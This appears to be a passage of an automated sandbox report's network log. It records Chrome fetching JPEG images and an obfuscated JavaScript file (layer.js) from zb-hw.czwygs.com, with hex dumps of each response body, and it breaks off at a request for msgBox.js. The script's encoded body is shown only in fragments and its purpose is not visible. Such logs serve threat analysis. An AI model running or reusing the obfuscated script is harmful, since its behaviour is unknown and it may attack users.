                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC635OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-6564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[1],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE2[343],EU-GER-frankfurt-GLOBAL1-CACHE14[328,TCP_MISS,342],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: faf249daddb63e4416c2e573af5abe6b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814506
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:18 UTC10205INData Raw: 20 6a 58 b1 d4 de 84 3f a4 2d 4e 32 c2 23 45 67 e5 69 55 90 39 81 eb 5f 43 4d 5d 3c f6 17 24 fc d5 59 d8 b6 b2 81 b6 ab 86 e3 d8 18 b6 dd 96 fd ad ae d3 6d 93 dc 52 00 14 a5 0d 78 70 e7 a3 b1 26 df 1d 9c d4 76 6c 3b 3e 78 c5 ad 4c f6 bc f6 f7 6e 60 30 cb 9c 93 40 b2 a2 28 3e cf 5d 2a 4c 58 9d ae 68 35 ce 96 35 b6 94 a5 59 a6 4f 73 2b 66 3a d4 a7 5d 49 0b 29 2a 21 20 f0 24 0f 43 af 79 11 28 1b b4 14 a4 cc c9 98 ed 4e b4 dd 1b 07 c8 2e af a5 6e a1 c4 97 d4 54 b7 14 0a 97 c4 fe 2a 9a 73 d3 de 7c 48 a6 c4 69 4f 26 24 8c 6e e7 53 e3 5b 26 e0 37 4b 74 e8 b6 e5 05 39 f3 b2 18 88 1d 0d d3 b6 a9 4e a1 a4 a8 fa 10 3a f4 85 c9 57 53 27 b0 53 73 62 48 b3 28 1a a9 61 f4 6b 4e 10 e4 39 16 43 12 5a 34 71 85 a5 d4 1f f3 24 83 c6 be 87 43 b8 04 10 7a 1a a2 c7 2b 43 2a ca
                                                                                                                                                          Data Ascii: jX?-N2#EgiU9_CM]<$YmRxp&vl;>xLn`0@(>]*LXh55YOs+f:]I)*! $Cy(N.nT*s|HiO&$nS[&7Kt9N:WS'SsbH(akN9CZ4q$Cz+C*


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          489192.168.2.55026190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC637OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4600"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE2[448],EU-GER-frankfurt-GLOBAL1-CACHE2[444,TCP_MISS,446],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6725f6762817029f4501e4b386350593
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814505
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:18 UTC2168INData Raw: 47 0d 80 be c3 75 83 76 e5 8b 35 00 68 53 c0 e6 23 15 ac db 45 f6 9d fb d3 09 fc a1 fe 6b c7 b8 ce 5b 8a e3 32 45 e8 58 38 93 72 2e 3d 90 44 83 ff 00 d3 62 a5 40 76 65 b4 d8 29 e8 3f 87 f6 eb 59 fa 63 2f 3a b0 9c 85 b3 20 34 5b c6 3b e2 4f 75 68 e8 1c c4 29 4e 11 36 40 12 f2 7f 14 6e 90 1d c5 54 65 32 50 f2 1d 8f 49 80 81 83 ec ee ee 7a 15 cc 5f 77 75 ad bf d5 c9 91 6d b6 d3 6d ba 9b df 4b 75 69 53 94 1d e6 65 ce df a2 02 e5 55 a9 19 b3 44 47 99 ff 00 48 94 93 9b c5 e4 a7 84 39 8e ce cb c4 ad a4 9f e0 c7 4b 45 2e 1e be 6d e3 af df 6a 6a 52 af 73 38 2f 70 1d 76 14 b6 f2 72 66 a4 37 b5 f8 91 a4 26 23 88 20 e8 4e df 22 94 47 52 05 47 56 ca cd c2 99 87 19 15 33 d9 7d 89 68 46 d7 51 25 c4 3c e9 23 c5 4b 6c 04 9b fd 95 02 85 14 ab 54 b2 a9 45 c5 ea 28 a3 4a 97
                                                                                                                                                          Data Ascii: Guv5hS#Ek[2EX8r.=Db@ve)?Yc/: 4[;Ouh)N6@nTe2PIz_wummKuiSeUDGH9KE.mjjRs8/pvrf7&# N"GRGV3}hFQ%<#KlTE(J


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          490192.168.2.55026290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC636OUTGET /pc/image-pc/video/guide.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC634INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 75656
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 24 Aug 2019 10:08:29 GMT
                                                                                                                                                          ETag: "5d610c9d-12788"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[1],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE4[295],EU-GER-frankfurt-GLOBAL1-CACHE12[290,TCP_MISS,293],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4d03b28d9578dea715b7659186e8ccef
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814506
                                                                                                                                                          X-CCDN-Expires: 2464134
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC15750INData Raw: ff d8 ff db 00 84 00 02 01 01 01 01 01 02 01 01 02 03 02 01 02 03 03 02 02 02 02 03 03 03 03 03 03 03 03 05 03 04 04 04 04 03 05 05 05 06 06 06 05 05 07 07 08 08 07 07 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 02 02 02 04 03 04 07 05 05 07 0a 08 07 08 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff dd 00 04 00 53 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 02 20 02 93 03 00 11 00 01 11 01 02 11 01 ff c4 00 ad 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 03 02 05 02 04 04 04 03 06 05 02 07 01 00 02 03
                                                                                                                                                          Data Ascii: SAdobed
                                                                                                                                                          2024-06-09 22:41:18 UTC16384INData Raw: af fb a8 90 9e db 2e 16 6f 26 c8 b2 c9 b5 3e 61 ce 77 e7 75 9e 86 c7 0c cf 0c 2e cf 1d 82 44 58 aa 2b d5 45 ba 4f 3a 12 46 39 69 e0 a8 ce 09 90 91 32 b3 ae 9c 23 d5 4f 03 44 c4 7e 6f 95 99 f1 d0 b5 b3 21 78 ba 54 dc 2a 5d 55 50 73 2b b6 c1 e0 27 aa 8f 82 c8 24 51 dc 66 c3 09 f6 e5 51 22 c4 66 eb aa 4b ce 91 ef ca ae 4c 91 92 ea 8a b3 af 46 76 1b a7 89 8c c8 75 2d 68 6d 23 80 38 6a d1 07 6c b1 ae 8c 64 ef 32 b8 ef b8 dd 74 31 33 34 86 8b 88 db bf 2b 6c 19 54 fc 05 8d 5b f3 ee b4 45 99 32 44 69 e0 97 11 f0 b5 e3 67 3f 3c 41 11 04 e4 2d 31 39 53 5d 93 61 76 30 7b 2d 11 66 79 22 ca 89 fa 48 2e f8 5a a0 cc f3 45 bd 14 c0 38 2b 13 31 64 46 82 d2 03 18 d7 bb 92 73 fe ca d8 9c cc c5 a4 2e 25 5c 63 92 25 b5 df cb 24 77 0a 44 29 11 e5 7e 4a 09 24 56 de 70 31 37 6e
                                                                                                                                                          Data Ascii: .o&>awu.DX+EO:F9i2#OD~o!xT*]UPs+'$QfQ"fKLFvu-hm#8jld2t134+lT[E2Dig?<A-19S]av0{-fy"H.ZE8+1dFs.%\c%$wD)~J$Vp17n
                                                                                                                                                          2024-06-09 22:41:18 UTC16384INData Raw: 3b d8 a7 19 f6 46 4a d1 6a da b6 96 07 11 9d b9 5a 77 30 b8 50 66 ae 36 0d 4f d9 a3 92 93 c9 43 50 65 35 7d d0 d4 d4 38 83 98 db b0 ca cf 2c b6 cd d8 f1 52 11 4f 53 ea d9 4e 13 1c a0 5a 50 d6 e8 c6 4f a7 b2 d5 09 99 67 02 d6 0b af 95 11 79 3c 70 55 b6 63 96 1b 63 94 77 99 62 3a e3 79 69 e7 3d 92 f2 4b 47 1f 05 ed bb ae aa e9 d9 e5 ca 75 7f ba 1c 51 a6 1c c9 c4 9f 1f 88 64 37 0e 69 50 f6 cb 57 a9 35 f0 53 f5 17 53 4b 77 7f e6 22 00 38 f7 56 45 51 9b 3e 77 99 fd 23 35 5d 3e a2 70 54 ac 94 22 55 54 c9 b9 2a 13 66 c8 22 ba a2 4c 92 4f 0b 34 d9 a6 28 8d 21 e7 dd 56 5c 31 21 db 75 19 32 51 1b 7b 9c 1a 00 50 6c 9a 1a 71 cb b3 d9 56 d9 30 15 00 f0 21 f1 92 77 08 a0 b1 a9 a9 cb c6 7b 05 09 44 92 90 d7 90 1a 76 1b aa f4 25 6c 7a 38 f7 18 0a 51 8f 64 59 3a 9a 23 26
                                                                                                                                                          Data Ascii: ;FJjZw0Pf6OCPe5}8,ROSNZPOgy<pUccwb:yi=KGuQd7iPW5SSKw"8VEQ>w#5]>pT"UT*f"LO4(!V\1!u2Q{PlqV0!w{Dv%lz8QdY:#&
                                                                                                                                                          2024-06-09 22:41:18 UTC16384INData Raw: ed 94 38 b9 c4 0c 00 ec ab e3 33 3b 83 34 be 23 f5 bd 1b e9 a3 a0 a8 8e 46 be 9a 5d 24 9c 1c 92 d0 14 32 41 ea 99 3c 52 5b 34 57 d8 29 2f 3d 41 71 a7 b6 d8 69 df 35 ca a1 cd 65 3c 6d 21 ae 2e 3e a1 bf 65 08 75 d8 f2 bb 54 7b 1b c6 ee 8a 1d 29 e0 17 4f 75 6f 49 4b f8 7e a0 7b 69 69 6b 1c e7 12 75 f9 67 5b 7d 5b 67 50 ee 16 3e 26 47 2c d2 4d f4 68 cb 04 b1 a6 bc 9c ce e5 f5 db e3 85 aa 99 b6 9b e5 25 05 54 70 30 44 1d 24 6f 8d fa 58 34 82 4b 08 19 56 cb d2 b1 c9 f9 64 3f 79 28 fc 1e 70 eb 9e a6 9b aa 7a 82 b3 a8 1f 0b 63 9e b6 67 d4 ca c0 f7 16 87 3c e4 81 9d d6 e4 9c 22 a3 f4 64 b5 27 65 15 0d 96 e5 7b 96 58 e8 c3 33 10 d6 e0 e7 63 62 71 b2 a2 6d 9a 20 91 0e e3 d2 d7 a8 5e 59 2b 1b 86 ec 70 e1 85 44 ac be 2d 22 a3 0e 86 6d 12 34 ea 69 c1 c6 39 0a b5 22 db
                                                                                                                                                          Data Ascii: 83;4#F]$2A<R[4W)/=Aqi5e<m!.>euT{)OuoIK~{iikug[}[gP>&G,Mh%Tp0D$oX4KVd?y(pzcg<"d'e{X3cbqm ^Y+pD-"m4i9"
                                                                                                                                                          2024-06-09 22:41:18 UTC10754INData Raw: 84 a6 91 7c 38 93 97 84 5b 54 78 3b d4 71 40 6b ae b5 14 94 64 6e e8 df 2f 98 7f fa 58 0e 54 16 5f ab 34 2f 4d 9f e1 14 5f f6 3a ba aa 42 2a a7 89 8d c9 2c 73 3d 04 81 df 4a b6 d2 1a f4 e9 7d 93 ac fe 12 dd 7a 84 7e 2e df 23 3c 98 c9 63 9f 21 6b 58 d2 3b ee 54 65 91 44 b2 3e 9d 7f 21 5e bc 1a 82 d3 4b 25 5d 6f 51 52 8a e8 da 5e ca 76 07 39 ce 23 7c 65 bb 6e 92 ca df 84 12 f4 ed 57 f9 1c e3 cc 06 47 3a a4 98 dd 92 4e 78 03 d8 2b ac c0 d0 ba 99 a6 22 39 58 74 b1 bc 82 01 d4 3b 7b 24 81 21 b7 b1 93 9d 55 59 f2 c9 f4 b5 bf e9 9e 11 74 4a 82 67 91 15 43 64 66 a3 11 f4 e3 9c 1f 64 58 a8 94 c7 46 d3 23 5e f1 1b 3b 34 9d f3 8e 02 8b 62 d4 8d 7a b9 cd 6f e9 aa 96 40 58 e8 6a 31 15 40 76 c1 f8 39 0d cf 3f b2 96 35 72 2f e3 3d 59 ce ee 35 34 12 35 cd 96 49 62 9b 3b
                                                                                                                                                          Data Ascii: |8[Tx;q@kdn/XT_4/M_:B*,s=J}z~.#<c!kX;TeD>!^K%]oQR^v9#|enWG:Nx+"9Xt;{$!UYtJgCdfdXF#^;4bzo@Xj1@v9?5r/=Y545Ib;


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          491192.168.2.55026390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC550OUTGET /pc/240516-03/static/js/components/layer.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC644INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 34888
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:51 GMT
                                                                                                                                                          ETag: "6645cacb-8848"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE7[429],EU-GER-frankfurt-GLOBAL1-CACHE14[408,TCP_MISS,428],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a36c1b06efb98e9dad8c67bd70b9a56a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823395
                                                                                                                                                          X-CCDN-Expires: 768605
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC15740INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 67 42 59 42 57 41 58 51 42 6f 42 76 41 49 67 41 59 42 68 41 4c 77 45 39 71 41 75 41 4d 77 46 63 30 59 41 58 41 4a 62 70 4d 49 63 6e 33 49 43 41 6c 4a 51 42 75 55 41 45 34 41 43 4a 41 46 34 61 41 4f 67 44 30 66 58 41 44 5a 61 2b 54 51 42 73 6f 7a 45 50 50 55 41 72 4a 4f 32 7a 56 69 7a 42 46 32 72 6c 63 41 54 6c 77 41 4f 43 74 53 31 39 38 74 41 42 4d 67 63 61 6d 35 6c 59 32 62 48 5a 6f 41 49 36 61 63 43 37 75 75 49 51 2b 66 67 48 34 62 71 46 6d 46 74 61 32 31 41 41 79 41 43 49 41 63 73 43 4a 48 72 53 70 32 76 6a 4a 68 69 62 5a 45 58 6d 65 48 4d 51 41 69 75 57 30 75 6c 58 2b 65 73 52 5a 34 62 6c 52 31 41 41 61 41 42 49 41 6d 67 42 61 48
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBYBWAXQBoBvAIgAYBhALwE9qAuAMwFc0YAXAJbpMIcn3ICAlJQBuUAE4ACJAF4aAOgD0fXADZa+TQBsozEPPUArJO2zVizBF2rlcATlwAOCtS198tABMgcam5lY2bHZoAI6acC7uuIQ+fgH4bqFmFta21AAyACIAcsCJHrSp2vjJhibZEXmeHMQAiuW0ulX+esRZ4blR1AAaABIAmgBaH
                                                                                                                                                          2024-06-09 22:41:18 UTC16384INData Raw: 6b 73 4e 33 54 54 72 64 30 48 77 53 78 31 4f 30 6e 47 46 45 79 32 46 32 4d 38 70 66 68 50 50 46 46 57 38 77 45 73 2b 41 65 53 52 66 44 67 37 79 62 64 56 75 69 59 46 41 78 63 7a 52 31 75 4d 6c 5a 66 4f 75 6e 68 56 6d 30 77 43 37 33 4c 47 32 55 41 59 74 36 61 2b 42 54 4c 62 78 56 79 73 6d 78 4c 57 36 59 42 31 76 6d 33 6c 75 44 33 73 5a 36 30 66 6f 6f 43 66 62 6e 65 33 30 7a 34 64 37 56 73 44 59 67 68 39 4c 66 37 78 6c 38 67 72 79 41 74 43 66 52 57 57 39 39 38 57 47 2f 65 4b 57 69 50 6d 63 35 44 2f 70 66 37 65 33 76 59 74 77 48 33 72 65 4f 2b 38 73 58 43 2b 34 6f 6a 46 34 57 44 4b 4a 76 39 7a 56 70 6b 4f 51 31 36 65 2f 4f 6e 67 4f 42 4c 2f 79 39 36 77 65 4b 76 74 35 41 7a 6c 32 4c 34 43 52 49 7a 57 57 77 73 74 6c 67 53 6e 4e 35 42 38 2f 50 73 54 42 4a 36 77
                                                                                                                                                          Data Ascii: ksN3TTrd0HwSx1O0nGFEy2F2M8pfhPPFFW8wEs+AeSRfDg7ybdVuiYFAxczR1uMlZfOunhVm0wC73LG2UAYt6a+BTLbxVysmxLW6YB1vm3luD3sZ60fooCfbne30z4d7VsDYgh9Lf7xl8gryAtCfRWW998WG/eKWiPmc5D/pf7e3vYtwH3reO+8sXC+4ojF4WDKJv9zVpkOQ16e/OngOBL/y96weKvt5Azl2L4CRIzWWwstlgSnN5B8/PsTBJ6w
                                                                                                                                                          2024-06-09 22:41:18 UTC2764INData Raw: 36 53 34 79 58 53 49 76 41 38 6a 32 77 78 71 77 66 68 57 53 37 5a 63 77 31 39 4f 56 36 74 71 55 41 67 73 52 69 64 2b 71 56 36 78 41 63 30 79 50 50 57 70 6e 52 42 50 34 67 6b 6a 33 61 74 4d 78 57 4f 36 6b 41 57 4f 79 39 34 49 48 4c 71 64 50 47 42 62 4c 79 79 2f 69 78 46 59 38 59 44 79 39 6d 61 78 58 45 43 41 63 73 55 65 63 4a 34 42 77 71 6e 57 68 77 76 41 57 67 46 44 4c 4e 41 41 63 4d 70 41 79 77 42 54 48 67 47 56 54 2f 41 48 30 41 4f 65 65 39 68 5a 72 74 33 4d 43 6d 73 43 53 41 5a 42 6a 58 72 4e 58 51 64 77 59 72 39 58 4b 56 52 6f 46 68 6d 48 44 32 73 43 6b 72 6d 75 58 74 55 62 4e 72 42 46 79 76 46 44 73 5a 78 75 37 43 72 38 54 57 4b 76 4f 7a 78 4b 31 47 68 6b 47 61 77 4f 43 42 69 41 61 71 38 67 39 42 35 74 6b 6e 67 56 43 72 72 50 73 49 57 79 4e 68 46 33
                                                                                                                                                          Data Ascii: 6S4yXSIvA8j2wxqwfhWS7Zcw19OV6tqUAgsRid+qV6xAc0yPPWpnRBP4gkj3atMxWO6kAWOy94IHLqdPGBbLyy/ixFY8YDy9maxXECAcsUecJ4BwqnWhwvAWgFDLNAAcMpAywBTHgGVT/AH0AOee9hZrt3MCmsCSAZBjXrNXQdwYr9XKVRoFhmHD2sCkrmuXtUbNrBFyvFDsZxu7Cr8TWKvOzxK1GhkGawOCBiAaq8g9B5tkngVCrrPsIWyNhF3


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          492192.168.2.55026490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC551OUTGET /pc/240516-03/static/js/components/msgBox.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
